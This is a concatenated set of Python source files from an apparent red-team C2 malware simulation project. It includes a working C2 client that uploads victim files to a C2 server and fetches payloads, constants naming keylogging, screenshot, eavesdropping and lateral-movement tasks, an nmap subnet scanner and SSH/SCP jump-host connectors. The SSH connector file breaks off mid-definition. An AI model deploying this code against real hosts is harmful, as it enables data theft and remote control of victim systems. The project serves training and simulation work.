self.fileProcessFunction = None self.downloadDir = dirpath if downloadDir is None else downloadDir if not os.path.isdir(self.downloadDir): print("Create the download storage folder: %s" %str(self.downloadDir)) os.mkdir(self.downloadDir) self.terminate = False print("c2Client init finished.") #----------------------------------------------------------------------------- # define all the private function here : def _getUrlDict(self): """ Init all the C2 comm API urls in this function, over write this function if use domain instead of IP address or use different C2 config,. """ if self.httpsFlg: return { 'getFile' : "https://%s:%s/filedownload" % (self.c2Ipaddr, str(self.c2Port)), 'postData' : "https://%s:%s/dataPost/" % (self.c2Ipaddr, str(self.c2Port)), 'postFile' : "https://%s:%s/fileupload" % (self.c2Ipaddr, str(self.c2Port)), 'postTask' : "https://%s:%s/taskPost" % (self.c2Ipaddr, str(self.c2Port)), 'getResult' : "https://%s:%s/getLastRst" % (self.c2Ipaddr, str(self.c2Port)) } return { 'getFile' : "http://%s:%s/filedownload" % (self.c2Ipaddr, str(self.c2Port)), 'postData' : "http://%s:%s/dataPost/" % (self.c2Ipaddr, str(self.c2Port)), 'postFile' : "http://%s:%s/fileupload" % (self.c2Ipaddr, str(self.c2Port)), 'postTask' : "http://%s:%s/taskPost" % (self.c2Ipaddr, str(self.c2Port)), 'getResult' : "http://%s:%s/getLastRst" % (self.c2Ipaddr, str(self.c2Port)) } #----------------------------------------------------------------------------- def _getData(self, getUrl, jsonDict, getFile=False): """ Send HTTP GET request to get data. Args: getUrl (str): url string. jsonDict (dict): json data send via GET. getFile (bool, optional): True: download file, False: get data. Defaults to False. Returns: 1. The file byte if can download file. 2. The data json dict() if can get data. 3. None if get failed or lose connection. """ self.reportLock.acquire() try: res = requests.get(getUrl, json=jsonDict, allow_redirects=True, verify=False) # set allow redirect to by pass load balancer if res.ok: self.reportLock.release() return res.content if getFile else res.json() except Exception as err: print("Error: _getData() > http server not reachable or GET error: %s" % str(err)) self.c2Connected = False # release the lock before return. if self.reportLock.locked():self.reportLock.release() return None #----------------------------------------------------------------------------- def _postData(self, postUrl, jsonDict, postfile=False): """ Send HTTP POST request to send data. Args: postUrl (str): url string. jsonDict (dict): json data send via POST. postfile (bool, optional): True: upload file, False: submit data/message. Defaults to False. Returns: _type_: Server repsonse or None if post failed / lose connection. """ self.reportLock.acquire() try: res = requests.post(postUrl, files=jsonDict, verify=False) if postfile else requests.post(postUrl, json=jsonDict, verify=False) if res.ok: print("http server reply: %s" % str(res.json())) self.reportLock.release() return res.json() except Exception as err: print("Error: _postData() > http server not reachable or POST error: %s" % str(err)) self.c2Connected = False if self.reportLock.locked(): self.reportLock.release() return None #----------------------------------------------------------------------------- def _reportTohub(self, action=None, data=None): """ Package the input action flag and action data with own ID, then report to C2 via POST. """ jsonDict = { 'id': self.id, 'free': self.freeFlg, ACT_KEY : action, 'data': data } reportUrl = self.c2urlDict['postData'] + str(jsonDict['id']) return self._postData(reportUrl, jsonDict) #----------------------------------------------------------------------------- def run(self): """ Main state report and task fetch loop called by start(). """ print("Start the C2 client main loop.") while not self.terminate: # report the state to C2 1st if there is state in queue. if self.submitAllStateToC2(): print("Reported the current state to C2.") else: print("Try to get task from C2 Server.") self.fetchTaskFromC2() time.sleep(self.c2ReportInterval) print("C2 client main loop end.") #----------------------------------------------------------------------------- # define all the public function here : def addNewTask(self, taskDict): """ Add a new task dict() to the C2 assigned task queue.""" c2taskDict = { 'taskID' : 0, 'taskType' : None, 'startT' : None, # None means start immediatly if recevied 'repeat' : 1, # how many times to repeat the task. 'ExPreT' : 0, # time to wait before execution 'state' : TASK_A_FLG, 'taskData' : None } c2taskDict.update(taskDict) if self.c2taskQueue.full(): print("C2Task queue is full, can not add new task from C2.") return False self.c2taskQueue.put(c2taskDict) return True #----------------------------------------------------------------------------- def addNewReport(self, reportDict): """ Add a new task state to the report queue.""" malwareRptDict = { 'taskID' : 0, 'state' : TASK_P_FLG, 'time' : None, 'taskData' : None } malwareRptDict.update(reportDict) #print('>> %s' %str(malwareRptDict)) if self.c2rptQueue.full(): print("C2Report queue is full, can not add new report to C2.") return False self.c2rptQueue.put(malwareRptDict) #----------------------------------------------------------------------------- def fetchTaskFromC2(self): """ Try to fetch one task from C2.""" if self.c2Connected: res = self._reportTohub(action=ACT_GET_TASK, data=None) if res is None: return False if 'task' in res.keys(): self.addNewTask(res['task']) print("Got new task: %s" %str(res['task'])) return True else: print('Invalied task information: %s', str(res.keys())) return False else: print("Try to reconnect to the server.") return self.registerToC2() #----------------------------------------------------------------------------- def getOneC2Task(self): """ Return one C2 task dict(). """ return None if self.c2taskQueue.empty() else self.c2taskQueue.get() #----------------------------------------------------------------------------- def registerToC2(self, taskList=[]): """ Register the parent malware to C2.""" print("Start to register to the C2 [%s]..." % str(self.c2Ipaddr)) dataDict = {'ipaddr': self.ipaddr, 'tasks': taskList} res = self._reportTohub(action=TSK_TYEP_RIG, data=dataDict) if not(res is None) and res['state'] == TASK_F_FLG: self.c2Connected = True print("Client connected to the C2 server.") return True return False #----------------------------------------------------------------------------- def submitAllStateToC2(self): """ Submit all the current stored malware state info in report queue to C2. Returns: bool: True if submitted successful, False if submit nothing """ if self.c2rptQueue.empty() or not self.c2Connected: return False reportList = [] while not self.c2rptQueue.empty(): report = self.c2rptQueue.get() print(report) reportList.append(report) res = self._reportTohub(action=TSK_TYPE_RPT, data=reportList) return True #----------------------------------------------------------------------------- def transferFiles(self, filePathList, uploadFlg=True): """ Transfer(upload/download) files to/from C2. Args: filePathList (list()): list of file upload or download. uploadFlg (bool, optional): True for uploading files, False for downloading files. Defaults to True. Returns: bool: True if C2 allows upload/download, else False. """ if uploadFlg: # Check whether C2 allows malware upload files. res = self._reportTohub(action=TSK_TYPE_UPLOAD, data=filePathList) if res is None or res[TSK_TYPE_UPLOAD] != ACT_ACCEPT_FLG: return False for filePath in filePathList: self.uploadfile(filePath, dataProcessFun=self.fileProcessFunction) time.sleep(0.1) # sleep a short time after the file uploaded. else: # Check whether C2 allows malware download files. res = self._reportTohub(action=TSK_TYPE_DOWNLOAD, data=filePathList) if res is None or res[TSK_TYPE_DOWNLOAD] != ACT_ACCEPT_FLG: return False for fileName in filePathList: self.downloadfile(fileName, fileDir=self.downloadDir, dataProcessFun=self.fileProcessFunction) time.sleep(0.1) return True #----------------------------------------------------------------------------- def uploadfile(self, filePath, dataProcessFun=None): """ Upload a file which is smaller than the TCP max buffer size.""" if os.path.exists(filePath): try: filename = os.path.basename(filePath) with open(filePath, 'rb') as fh: filedata = fh.read() if dataProcessFun is None else dataProcessFun(fh.read()) uploadUrl = self.c2urlDict['postFile'] dataDict = {'file': (filename, filedata)} print('Info: uploading file %s ...' %str(filename)) res = self._postData(uploadUrl, dataDict, postfile=True) return res except Exception as err: print("Error: uploadfile() > File IO error: %s" % str(err)) return None else: print("Upload file : %s not exist." % str(filePath)) return None #----------------------------------------------------------------------------- def downloadfile(self, filename, fileDir=None, dataProcessFun=None): """ Download a file from the C2 server and save to local dir.""" if fileDir and not os.path.isdir(fileDir): os.mkdir(fileDir) filePath = os.path.join(self.downloadDir, filename) if fileDir is None else os.path.join(fileDir, filename) uploadUrl = self.c2urlDict['getFile'] dataDict = {"filename": filename} print('Info: downloading file %s ...' %str(filename)) filedata = self._getData(uploadUrl, dataDict, getFile=True) if dataProcessFun: filedata = dataProcessFun(filedata) try: with open(filePath, 'wb') as fh: fh.write(filedata) return True except Exception as err: print("Error: downloadfile() > Create download file error : %s" %str(err)) return None #----------------------------------------------------------------------------- def setClientLoopInv(self, timeInv): """ Set the client main loop sleep interval.""" self.c2ReportInterval = int(timeInv) def setFileProcessFunction(self, func): """ Set the function to process the GET/POST data.""" self.fileProcessFunction = func #----------------------------------------------------------------------------- def stop(self): print("Set the c2 client terminate flag.") self.terminate = True #----------------------------------------------------------------------------- def postTask(self, malwareID, taskDict): """ Assign a task to the specific malware via the C2 taskPost API, this function is not used for the malware. Args: malwareID (str): malware unique ID. taskDict (dict): a task json, example: { 'taskID': 1, 'taskType': 'upload', 'startT': None, 'repeat': 1, 'exePreT': 0, 'state' : TASK_P_FLG, 'taskData': [os.path.join(dirpath, "update_installer.zip")] } Returns: _type_: post result. """ keysList = taskDict.keys() jsonDict = { 'id' : malwareID, 'taskType' : taskDict['taskType'] if 'taskType' in keysList else TSK_TYPE_CMD, 'startT' : taskDict['startT'] if 'startT' in keysList else None, 'repeat' : taskDict['repeat'] if 'repeat' in keysList else 1, 'exePreT' : taskDict['exePreT'] if 'exePreT' in keysList else 0, 'taskData' : taskDict['taskData'] if 'taskData' in keysList else None, 'state' : TASK_P_FLG } result = self._postData(self.c2urlDict['postTask'], jsonDict) return result #----------------------------------------------------------------------------- def getLastRst(self, malwareID=None): """ Get the specific malware's last task execution result from C2 Args: malwareID (str, optional): unique malware ID. Defaults to None. Returns: _type_: _description_ """ jsonDict = { 'id': self.id if malwareID is None else str(malwareID) } result = self._getData(self.c2urlDict['getResult'], jsonDict) return result #----------------------------------------------------------------------------- #----------------------------------------------------------------------------- def testCase(mode): if mode == 0: print("Test Case 1: simulate the malware side to connect to C2.") from datetime import datetime ownID = 'malwareSide' client = c2Client(ownID,'127.0.0.1', c2Port=5000) client.registerToC2(taskList=[{ 'taskID' : 0, 'taskType' : TSK_TYEP_RIG, 'startT' : datetime.now().strftime('%Y-%m-%d %H:%M:%S'), 'repeat' : 1, 'exePreT' : 0, 'state' : TASK_R_FLG, 'taskData' : None }] ) filePath = os.path.join(dirpath, 'update_installer.zip') print("1 - test upload file.") client.uploadfile(filePath) time.sleep(1) print("2 - test download file.") client.downloadfile('2023-12-13_100327.png') time.sleep(1) print("3 - simulate the hacker side to connect to C2 assign task.") testTaskJson = { 'taskID' : 1, 'taskType' : TSK_TYPE_CMD, 'startT' : None, 'repeat' : 1, 'exePreT' : 0, 'state' : TASK_P_FLG, 'taskData' : ['ls', 'dir', 'ifconfig'] } client.postTask(ownID, testTaskJson) time.sleep(5) client.stop() if mode == 1: # test case mode 1 must run after test mode 0 ownID = 'HackerSide' client = c2Client(ownID,'127.0.0.1', c2Port=5000) print("4 - simulate another hacker side to connect to C2 assign task to malwareSide") testTaskJson = { 'taskType' : TSK_TYPE_CMD, 'startT' : None, 'repeat' : 1, 'exePreT' : 0, 'state' : TASK_P_FLG, 'taskData' : ['ifconfig'] } malwareID = 'malwareSide' client.postTask(malwareID, testTaskJson) time.sleep(5) client.stop() if mode == 2: # test case mode 2 must run after test mode 0 ownID = 'HackerSide' client = c2Client(ownID, '127.0.0.1', c2Port=5000) print("5 - simulate another hacker side to connect to C2 get malwareSide last execution result") malwareID = 'malwareSide' result = client.getLastRst(malwareID=malwareID) print("Task result: %s" % str(result)) time.sleep(5) client.stop() #----------------------------------------------------------------------------- if __name__ == '__main__': testmode = 0 testCase(testmode)
23,303
Python
.py
473
38.458774
139
0.528751
LiuYuancheng/Ninja_C2_Malware_Simulation_System
8
2
0
GPL-3.0
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,484
__init__.py
LiuYuancheng_Ninja_C2_Malware_Simulation_System/src/lib/__init__.py
#!/usr/bin/python #----------------------------------------------------------------------------- # Name: __init__.py # # Purpose: The regular package init module to init the customer "lib". # # Author: Yuancheng Liu # # Created: 2014/01/15 # Copyright: Copyright (c) 2024 LiuYuancheng # License: MIT License #----------------------------------------------------------------------------- """ Package Info Name: lib Description: - provide the module used for the infra monitor hub's frontend web host and the backend data base handler . Modules inclided in the current package: 1. ConfigLoader.py: - Provide API to load the not stand text format config file's data. 2. Log.py: - Provide the addtional log function to do the program execution log archiving feature. 3. c2Client.py: - Provide the API to connect and communication to the c2 server to use the related function. 4. c2Constants.py: - Define all the constants used in the c2 server and client. 5. c2MwUtiles.py - Utilities functions module used in the c2 clients to implememt the basic attack actions. 6. keyEventActors.py - Provide the API to handle and generate the keyboard event. 7. mouseEventActors.py - Provide the API to handle and genearte the mouse event. 8. nmapUtils.py - Nmap untilities function to call the nmap API to do the network scan and service probe. 9. SSHconnector.py - Provide the API to connect and communication to the remote host via SSH protocol. 10. SCPconnector.py - Provide the API to connect and communication to the remote host via SSH to handle file scp operation. 11. tsharkUtils.py - Wireshark untilities function to call the tshark API to do the packet capture and analysis. """
1,723
Python
.py
45
36.755556
92
0.704149
LiuYuancheng/Ninja_C2_Malware_Simulation_System
8
2
0
GPL-3.0
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,485
nmapUtils.py
LiuYuancheng_Ninja_C2_Malware_Simulation_System/src/lib/nmapUtils.py
#----------------------------------------------------------------------------- # Name: nmapUtils.py # # Purpose: This module is a untility module of the lib <python-nmap> to provide # some extend function. The module need netowork scan software Nmap to # be installed: https://nmap.org/download # # Author: Yuancheng Liu # # Version: v_0.1.1 # Created: 2023/03/10 # Copyright: Copyright (c) 2023 LiuYuancheng # License: MIT License #----------------------------------------------------------------------------- """ Program Design: python-nmap is a python library which helps in using nmap port scanner. It allows to easilly manipulate nmap scan results and will be a perfect tool for systems administrators who want to automatize scanning task and reports. The nmapUtils module is a package moudle of python-nmap, it will parse the result of python-nmap and only provide the result user need. <python-nmap> link: https://pypi.org/project/python-nmap/ """ import re import ipaddress import nmap # pip install python-nmap, OPEN_TAG = 'open' # Port opened CLOSE_TAG = 'closed' # Port closed FILTER_TAG = 'filtered' # Port touchable but no reponse or the response can not be recognised by nmap UNKNOWN_TAG = 'unknown' STATE_UP = 'up' STATE_DOWN = 'down' # Regular expression pattern string for IPv4 subnet format SUBNET_PT_STR = r'^(\d{1,3}\.){3}\d{1,3}/\d{1,2}$' # Regular expression pattern string for IPv4 address format IP_PT_STR = r'^(\d{1,3}\.){3}\d{1,3}$' #----------------------------------------------------------------------------- #----------------------------------------------------------------------------- class nmapScanner(object): """ A port scanner used to check the port, service state of a target IP. """ def __init__(self) -> None: """ Init the scanner. Example: scanner = nmapScanner()""" self.scanner = nmap.PortScanner() self.resultDict = None #----------------------------------------------------------------------------- def _parseNmapDict(self, nmapDict, protocalType='tcp', showFiltered=False): """ Convert the Nmap scan result dict to {'<portnum>':(<state>, <serviceType>), ...} format. Args: nmapDict (dict): nampScanDict[<ip>] protocalType (str, optional): protocalType. Defaults to 'tcp'. showFiltered (bool, optional): whether show 'filtered' port. Defaults to False. Returns: dict: refer to function introduction. """ resultDict = {} if protocalType in nmapDict.keys(): nmapInfo = nmapDict[protocalType] for port, state in nmapInfo.items(): if state['state'] == FILTER_TAG and not showFiltered: continue serviceName = state['name'] if 'name' in state.keys() else UNKNOWN_TAG isopen = state['state'] if 'state' in state.keys() else CLOSE_TAG resultDict[str(port)] = (isopen, serviceName) return resultDict #----------------------------------------------------------------------------- def getLastScanRawResult(self): return self.resultDict #----------------------------------------------------------------------------- def scanPortDecorator(scanFunction): """ A decorator class to pre-check the target ip address, then call the detailed scan function to do the port/service scan to update the reuslt. Args: scanFunction (_type_): a scan function same as below parameters config: scanFunction(self, target, portInfo, showFiltered=showFiltered) """ def innerFunc(self, target, portInfo, showFiltered=False): self.resultDict = {} target = '127.0.0.1' if str(target).strip().lower() == 'localhost' else str(target).strip() self.resultDict = {'target': target, 'state': STATE_DOWN} # Call the detail scan function to update the <self.resultDict> # [*set(portInfo)] : remove the duplicate in the list [80, 80] => [80] scanFunction(self, target, [*set(portInfo)], showFiltered=showFiltered) if target in self.scanner.all_hosts(): nmapInfo = self.scanner[str(target)] self.resultDict['state'] = nmapInfo.state() if self.resultDict['state'] == 'up': self.resultDict.update(self._parseNmapDict(nmapInfo, protocalType='tcp',showFiltered=showFiltered)) return self.resultDict.copy() return innerFunc #----------------------------------------------------------------------------- @scanPortDecorator def scanTcpPorts(self, target, portList, showFiltered=False): """ Check a list TCP ports' state and service type. Args: target (_type_): target IP address/Url. portList (_type_): list of int ports. showFiltered (bool, optional): whether show the 'filtered' state port. Defaults to False. Returns: dict: example: { 'target': '127.0.0.1', 'state': 'up', '134': ('closed', 'ingres-net'), '443': ('open', 'https'), '3000': ('open', 'ppp')} """ for i in portList: self.resultDict[str(i)] = (CLOSE_TAG, UNKNOWN_TAG) argStr = '-p ' + ','.join([str(i) for i in portList]) self.scanner.scan(hosts=target, arguments=argStr, timeout=10) #----------------------------------------------------------------------------- def scanTcpPortsOld(self, target, portList, showFiltered=False): """ Same as function function scanTcpPorts() without decorated, current this function is not used. """ if str(target).lower() == 'localhost': target = '127.0.0.1' resultDict = {'target': target, 'state': 'down'} for i in portList: resultDict[str(i)] = (CLOSE_TAG, UNKNOWN_TAG) argStr = '-p ' + ','.join([str(i) for i in portList]) self.scanner.scan(hosts=target, arguments=argStr, timeout=10) if target in self.scanner.all_hosts(): nmapInfo = self.scanner[str(target)] resultDict['state'] = nmapInfo.state() if resultDict['state'] == 'up': resultDict.update(self._parseNmapDict(nmapInfo, protocalType='tcp',showFiltered=showFiltered)) return resultDict #----------------------------------------------------------------------------- @scanPortDecorator def scanPortRange(self, target, portRange, showFiltered=False): """ Scan a port range and return the result. Args: target (str): target IP address/Url. portRange (tupple): (start port, end port) showFiltered (bool, optional): whether show the 'filtered' state port. Defaults to False. Returns: _type_: _description_ """ argStr = str(portRange[0])+'-'+str(portRange[1]) self.scanner.scan(target, argStr, timeout=10) #----------------------------------------------------------------------------- def scanPortRangeOld(self, target, portRange, showFiltered=False): """ Same as function function scanPortRange()without decorated, current this function is not used.""" if str(target).lower() == 'localhost': target = '127.0.0.1' resultDict = {'target': target, 'state': 'down'} argStr = str(portRange[0])+'-'+str(portRange[1]) self.scanner.scan(target, argStr, timeout=10) if target in self.scanner.all_hosts(): nmapInfo = self.scanner[str(target)] resultDict['state'] = nmapInfo.state() if resultDict['state'] == 'up': resultDict.update(self._parseNmapDict(nmapInfo, protocalType='tcp',showFiltered=showFiltered)) return resultDict #----------------------------------------------------------------------------- def fastScan(self, target): """ fast Scan a target, same as the cmd: nmap -F <ip> """ return self._fastScanTarget(target, []) @scanPortDecorator def _fastScanTarget(self, target, portInfo, showFiltered=False): self.scanner.scan(hosts=target, arguments='-F', timeout=10) #----------------------------------------------------------------------------- def scanServices(self, target, serviceList): """ Check a list of service type. Args: target (_type_): arget IP address/Url. serviceList (_type_): service list. Returns: _type_: example: { 'target': '127.0.0.1', 'state': 'up', 'http': { '80': ('closed', 'http'),'8008': ('closed', 'http')}, 'https': {'443': ('open', 'https')} } """ resultDict = {'target': None, 'state': None} for se in serviceList: resultDict[str(se)] = {} self._scanServices(target, serviceList) resultDict['target'] = self.resultDict['target'] resultDict['state'] = self.resultDict['state'] for item in self.resultDict.items(): key, val = item if isinstance(val, tuple): serviceType = val[-1] if serviceType in resultDict.keys(): resultDict[serviceType][key] = val return resultDict @scanPortDecorator def _scanServices(self, target, serviceList, showFiltered=False): #argStr = '-p ' + ','.join([str(i) for i in serviceList]) #self.scanner.scan(hosts=target, arguments=argStr, timeout=10) self.scanTcpPorts(target, serviceList) #----------------------------------------------------------------------------- def scanSubnetIps(self, subnetStr): """ Scan the subnet and find the reachable IP addresses. Args: subnetStr (str): subnet string, such as """ # Check the input string valid pattern = re.compile(SUBNET_PT_STR) if bool(pattern.match(subnetStr)): self.scanner.scan(hosts=subnetStr, arguments='-sn') addresses = self.scanner.all_hosts() return addresses else: print("Error: scanSubnetIps() > Invalid subnet string: %s " %str(subnetStr)) return None #----------------------------------------------------------------------------- #----------------------------------------------------------------------------- def testCase(mode): scanner = nmapScanner() if mode == 0: print("Test function: scanTcpPorts() ") print(' - 1.Scan reachable ip:') rst = scanner.scanTcpPorts('172.18.178.6', [22, 443,8008]) print('\t', rst) print(' - 2.Scan reachable ip, show filtered port:') rst = scanner.scanTcpPorts('172.18.178.6', [80], showFiltered=True) print('\t', rst) print(' - 3.Scan un-reachable ip:') rst = scanner.scanTcpPorts('172.18.178.11', [80], showFiltered=True) print('\t', rst) elif mode == 4: print(' - 4.Scan localhhost:') rst = scanner.scanTcpPorts('localhost', [134, 443, 3000]) print('\t', rst) elif mode == 5: print(' - 5.Scan port range 22 - 30') rst = scanner.scanPortRange('172.18.178.6', (22,30), showFiltered=True ) print('\t', rst) elif mode == 6: print(' - 6.Fast scan') rst = scanner.fastScan('localhost') print('\t', rst) elif mode == 7: print(' - 7.Scan service test 1') rst = scanner.scanServices('localhost', ['http', 'http', 'ppp', 'https']) print('\t', rst) elif mode == 8: print(' - 8.Scan service test 2') rst = scanner.scanServices('sg.pool.ntp.org', ['ntp']) print('\t', rst) elif mode == 9: print(' - 9.Scan all IP address in Subnet') print('9.1 test invlid input') invalidSubnetStr = "172.18.178." rst = scanner.scanSubnetIps(invalidSubnetStr) print('\t', rst) subnetStr = "172.25.121.0/24" print('9.2 test scan subnet: %s' %str(subnetStr)) rst = scanner.scanSubnetIps(subnetStr) print('\t', rst) #----------------------------------------------------------------------------- #----------------------------------------------------------------------------- if __name__ == '__main__': testCase(9)
12,778
Python
.py
256
40.214844
119
0.522405
LiuYuancheng/Ninja_C2_Malware_Simulation_System
8
2
0
GPL-3.0
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,486
SCPconnector.py
LiuYuancheng_Ninja_C2_Malware_Simulation_System/src/lib/SCPconnector.py
#!/usr/bin/python #----------------------------------------------------------------------------- # Name: SCPconnector.py # # Purpose: This module will use SSHconnector and python-scp module to scp # upload/download file from the program running host to the dest # server (through a jump hosts chain). # # Author: Yuancheng Liu # # Created: 2022/08/01 # Version: v_0.1 # Copyright: National Cybersecurity R&D Laboratories # License: #----------------------------------------------------------------------------- """ Program Design: We want to create a scp connector which can scp transfer files (upload/download) thought a ssh jumphosts chain: scpConnectorHost ---> jumphost1 ---> jumphost2---> ... ---> destinationHost Dependency: This module need to use: - SSHconnector - python scp module: https://pypi.org/project/scp/ Usage Example: destInfo = ('gateway.ncl.sg', '<userA>', '<userApassword>') scpClient = scpConnector(destInfo, showProgress=True) scpClient.uploadFile('scpTest.txt', '~/scpTest2.txt') scpClient.downFile('~/scpTest2.txt') scpClient.close() Detail usage example refer to testcase file <scpConnectorTest.py> """ import os import sys from scp import SCPClient from SSHconnector import sshConnector TNL_TEST_CMD = 'pwd' # a test cmd to confirm the ssh tunnel is ready. #----------------------------------------------------------------------------- #----------------------------------------------------------------------------- class scpConnector(object): def __init__(self, destInfo, jumpChain=None, showProgress=False) -> None: """ Init the connector. Args: destInfo (tuple): The destation host's ssh login information. example: (sshHost(ip/domain), userName, password) jumpChain (list, optional): The jump host chain ssh info: scpConnectorHost ---> jumphost1 ---> jumphost2---> ... ---> destinationHost [jumphost1Infor, jumphost2Info]. example: [(JumpHost1_ip, userName, password), (JumpHost2_ip, userName, password) ...] Defaults to None. showProgress (bool, optional): Flag to identify whether show the file transmation progress. Defaults to False, better to set True when transfer big file. """ self.destHost = None if len(destInfo) != 3: print("The destination information is invalid: %s" %str(destInfo)) return None sshHost, userName, password = destInfo if jumpChain is None or len(jumpChain) == 0: self.destHost = sshConnector(None, sshHost, userName, password) self.destHost.addCmd(TNL_TEST_CMD, None) self.destHost.InitTunnel() self.destHost.runCmd(interval=0.1) else: jumpHostHead = jumpHostTail = None for jumpInfo in jumpChain: sshHostJP, userNameJP, passwordJP = jumpInfo if jumpHostHead is None: jumpHostHead = jumpHostTail = sshConnector(None, sshHostJP, userNameJP, passwordJP) else: jumpHost = sshConnector(jumpHostTail, sshHostJP, userNameJP, passwordJP) jumpHostTail.addChild(jumpHost) jumpHostTail = jumpHost self.destHost = sshConnector(jumpHostTail, sshHost, userName, password) self.destHost.addCmd(TNL_TEST_CMD, None) jumpHostTail.addChild(self.destHost) jumpHostHead.InitTunnel() jumpHostHead.runCmd(interval=0.1) if self.destHost is None: print('SSH tunnel fault') return None # File transfer progress display function. def progress4(filename, size, sent, peername): sys.stdout.write(" => (%s:%s) %s's progress: %.2f%% \r" % (peername[0], peername[1], filename, float(sent)/float(size)*100)) self.scpClient = SCPClient(self.destHost.getTransport(), progress4=progress4) if showProgress else SCPClient(self.destHost.getTransport()) print("scpConnector ready.") #----------------------------------------------------------------------------- def uploadFile(self, srcPath, destPath): """ Upload srcPath file to the destination. Args: srcPath (str): source file path. destPath (str): desination file path. """ if self.scpClient: if os.path.exists(srcPath): try: self.scpClient.put(srcPath, destPath) print("File %s transfer finished" % str(srcPath)) except Exception as err: print("File translate failed: %s" % str(err)) else: print("The srouce file is not exist") else: print("The scpConnector is not inited.") #----------------------------------------------------------------------------- def downFile(self, srcPath, localPath=''): """ download file from destination. Args: srcPath (_type_): destination host file path. localPath (str, optional): local path. Defaults to '' same as the program folder. """ if self.scpClient: try: self.scpClient.get(srcPath, local_path=localPath) if localPath and os.path.exists(srcPath): print("File %s transfer finished" % str(srcPath)) except Exception as err: print("File translate failed: %s" %str(err)) else: print("The scpConnector client is not inited") #----------------------------------------------------------------------------- def close(self): """ close the scpClient and the sshTunnel.""" self.scpClient.close() self.destHost.close()
6,022
Python
.py
126
37.714286
146
0.551073
LiuYuancheng/Ninja_C2_Malware_Simulation_System
8
2
0
GPL-3.0
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,487
c2Constants.py
LiuYuancheng_Ninja_C2_Malware_Simulation_System/src/lib/c2Constants.py
#!/usr/bin/python #----------------------------------------------------------------------------- # Name: c2Constants.py [python3] # # Purpose: This module is used to define all the used constants in the c2 # malware project which used by <c2Client.py> and <c2MwUtiles.py> # modules. # # Author: Yuancheng Liu # # Created: 2024/05/17 # version: v0.2.3 # Copyright: Copyright (c) 2024 LiuYuancheng # License: MIT License #----------------------------------------------------------------------------- """ For one type of state flag, the value should be unique. - FLG : Flag can be int or str. - KEY : Key must be str type. - TYPE: type must be str type. """ #----------------------------------------------------------------------------- # Define all the task state here : TASK_P_FLG = 0 # task pending flag (Task is enqueued in the RTC2-Hub task manager's sending queue.) TASK_F_FLG = 1 # task finish flag (Task information has been sent to related the Red-Teaming-Malicious-Action-Program.) TASK_A_FLG = 2 # task accept flag (Task execution finished and state updated in the RTC2-Hub.) TASK_E_FLG = 3 # task error flag (Tasks execution got error.) TASK_R_FLG = 4 # task running flag (Tasks executing.) #----------------------------------------------------------------------------- # Define all the action flag here: ACT_KEY = 'action' ACT_GET_TASK = 'getTask' ACT_ACCEPT_FLG = 'ok' ACT_REJECT_FLG = 'no' #----------------------------------------------------------------------------- # Define all the task type here: TSK_TYEP_RIG = 'register' # Task type : register angent to C2 TSK_TYPE_CMD = 'command' # Task type : execute command on victim TSK_TYPE_RPT = 'report' # Task type : report task execution result to C2 TSK_TYPE_SSH = 'sshRun' # Task type : use victim to ssh another vicimt and run cmd. TSK_TYPE_SCP = 'scpFile' # Task type : scp the victim file to another victim. TSK_TYPE_UPLOAD = 'upload' # Task type : upload a victim file to C2 TSK_TYPE_DOWNLOAD = 'download' # Task type : download a file from C2 to victim TSK_TYPE_SCANNET = 'scanSubnet' # Task type : scan victim's subnet TSK_TYPE_KEYBD = 'keyEvent' # Task type : record keyboard and generate keyboard event on victim. TSK_TYPE_SCREENST = 'screenShot' # Task type : capture the victim screen shot. TSK_TYPE_EAVESDP = 'eavesDrop' # Task type : eavesDrop victim network traffic.
2,491
Python
.py
46
52.652174
120
0.57675
LiuYuancheng/Ninja_C2_Malware_Simulation_System
8
2
0
GPL-3.0
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,488
SSHconnector.py
LiuYuancheng_Ninja_C2_Malware_Simulation_System/src/lib/SSHconnector.py
#!/usr/bin/python #----------------------------------------------------------------------------- # Name: SSHconnector.py # # Purpose: This module is used to create a ssh connector to provide nested # ssh tunnel connection through jumphosts with an editable tcp port. # (host with NAT port forwarding setup such as: ssh -p port ...@host). # # Author: Yuancheng Liu # # Created: 2022/08/01 # Version: v_0.1.3 # Copyright: Copyright (c) 2024 LiuYuancheng # License: MIT License #----------------------------------------------------------------------------- """ Program Design: We want to create a ssh connector program to provide single/multiple ssh access tunnel function through jumphosts and execute command as normal user or admin on different host. The commands will be added in a queue and execution sequence will be FIFO. The connectors can be combined togeter to build ssh tennel chain. SSH tunnel function: 1.Single connection A ---> jumphost1 ---> jumphost2---> ... ---> targethost (run cmd) 2.Multiple connection (root) A ---> jumphost1 ---> jumphost2 ---> ... ---> targethost1 (run cmd) | + ---> jumphost3 (run cmd) ---> ... ---> targethost2 | + ---> jumphost4 ---> ... ---> targethost3 3.Multiple connection (tree) A ---> jump host1 (run cmd) ---> target host (run cmd) | B ---> + | C ---> + Dependency: This module need to use the python paramiko ssh lib: https://www.paramiko.org/ Usage steps: 1. Init all the connectors. 2. Create the ssh tunnel chain by addChlid() function. 3. Add the cmd you want to execute and the result handler function in each host's related connector by addCmd() function. 4. Init the ssh tunnel chain by all the root connector's InitTunnel(). 5. Run all the cmds in every connector by call the root connectors' runCmd() function. 6. After finished call root connector's close() to close all the ssh session. Detail usage example refer to testcase file <sshConnectorTest.py> """ import time import paramiko CH_KIND = 'direct-tcpip' # open channel type/kind for jump hosts, we use direct TCP. #----------------------------------------------------------------------------- #----------------------------------------------------------------------------- class sshConnector(object): def __init__(self, parent, host, username, password, port=22) -> None: """ Init the ssh connector obj. example: mainHost = sshConnector(None, host, username, password) Args: parent (sshConnector or paramiko.SSHClient): parent ssh client. host (str): host ip address or host domain name. username (str): username. password (str): user password. port (int, optional): ssh port. Defaults to 22. """ # init public parameters. self.parent = parent # object parent. self.host = host self.username = username self.password = password self.sudoPassword = None self.port = port self.client = None self.childConnectors = [] # children connectors. self.connected = False self.cmdlines = [] # commands need to run under the current host. self.replyHandler = None # own reply handler. self.lock = False # lock the new added in #----------------------------------------------------------------------------- def addChild(self, childConnector): """ Add a sshConnector obj or a paramiko.SSHClient obj as a child. Args: childConnector (sshConnector): ssh connector/paramiko.SSHClient object. Returns: bool: True if the chlid is added. """ if self.lock: print("Error: can not add new child host: children host adding locked!") return False self.childConnectors.append(childConnector) return True #----------------------------------------------------------------------------- def addCmd(self, cmdline, 